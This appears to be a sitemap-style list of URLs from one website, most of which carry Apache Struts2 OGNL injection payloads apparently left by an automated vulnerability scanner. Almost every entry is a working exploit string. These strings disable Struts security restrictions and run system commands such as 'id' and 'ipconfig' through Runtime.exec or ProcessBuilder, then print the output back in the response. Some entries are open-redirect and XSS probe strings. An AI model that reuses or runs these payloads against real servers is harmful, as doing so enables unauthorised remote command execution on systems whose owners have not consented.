http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm84441%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem39126?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 